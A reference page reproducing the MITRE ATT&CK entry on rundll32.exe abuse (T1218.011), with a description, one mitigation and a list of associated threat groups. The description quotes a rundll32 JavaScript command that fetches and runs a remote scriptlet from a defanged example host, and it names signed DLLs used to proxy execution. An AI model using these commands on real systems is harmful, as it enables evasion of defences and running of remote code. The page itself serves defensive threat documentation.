---
layout: technique
title: Rundll32
mitre_id: T1218.011
permalink: "/techniques/T1218.011/"
mitre_url: https://attack.mitre.org/techniques/T1218/011
domains:
- enterprise
domain: enterprise
tactic_ids:
- TA0005
is_subtechnique: true
parent_mitre_id: T1218
source_attribution: "© The MITRE Corporation. This work is reproduced and distributed
  with the permission of The MITRE Corporation."
description_excerpt: 'Adversaries may abuse rundll32.exe to proxy execution of malicious
  code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid
  triggering security tools that may not monitor execution of the rundll32.exe process
  because of allowlists or false positives from '
attack_version: '19.1'
---

## Description

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).

Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. [Trend Micro CPL](https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf) For example, ClickOnce can be proxied through Rundll32.exe.

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. [This is Security Command Line Confusion](https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/) 

Threat actors may also abuse legitimate, signed system DLLs (e.g., <code>zipfldr.dll, ieframe.dll</code>) with <code>rundll32.exe</code> to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection. [lolbas project Zipfldr.dll](https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/) [lolbas project Ieframe.dll](https://lolbas-project.github.io/lolbas/Libraries/Ieframe/) 

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>Example...

### Mitigations

- [Exploit Protection](/mitigations/M1050/) (`M1050`)

### Groups

- [APT19](/apt0073)
- [APT28](/apt28)
- [APT3](/apt0022)
- [APT32](/apt32)
- [APT38](/apt0082)
- [APT41](/apt41)
- [Aquatic Panda](/apt0143)
- [Blue Mockingbird](/apt0108)
- [Carbanak](/fin7)
- [CopyKittens](/apt0052)
- [Daggerfly](/apt1034)
- [FIN7](/fin7)
- [Gamaredon Group](/apt0047)
- [HAFNIUM](/apt0125)
- [Kimsuky](/apt0094)
- [Lazarus Group](/lazarus)
- [LazyScripter](/apt0140)
- [Magic Hound](/apt35)
- [MuddyWater](/apt0069)
- [RedCurl](/apt1039)
- [Sandworm Team](/apt0034)
- [Storm-0501](/apt1053)
- [TA505](/cl0p)
- [TA551](/apt0127)
- [UNC3886](/apt1048)
- [Wizard Spider](/wizard-spider)


---

*© The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.*
